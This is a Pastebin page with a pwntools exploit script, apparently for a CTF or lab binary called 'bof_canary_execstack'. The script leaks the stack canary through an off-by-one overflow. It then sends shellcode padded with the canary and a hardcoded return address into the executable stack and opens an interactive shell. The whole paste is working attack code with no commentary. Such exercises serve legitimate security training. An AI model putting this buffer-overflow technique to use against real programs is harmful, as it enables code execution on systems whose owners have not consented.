Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- with open("shellcode", "rb") as f:
- shellcode = f.read()
- r = process("./bof_canary_execstack", aslr=False)
- gdb.attach(r)
- sleep(0.3)
- msg = b"a" * 0x39
- r.sendline(str(len(msg)))
- r.send(msg)
- r.recvn(len(msg))
- canary = r.recvn(7)
- canary = b"\x00" + canary
- info("canary: 0x{:016x}".format(u64(canary)))
- r.clean()
- msg = shellcode
- msg = msg.ljust(0x38, b"a")
- msg += canary
- msg += p64(0)
- msg += p64(0x7fffffffe1d0)
- r.sendline(str(len(msg)))
- r.send(msg)
- r.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement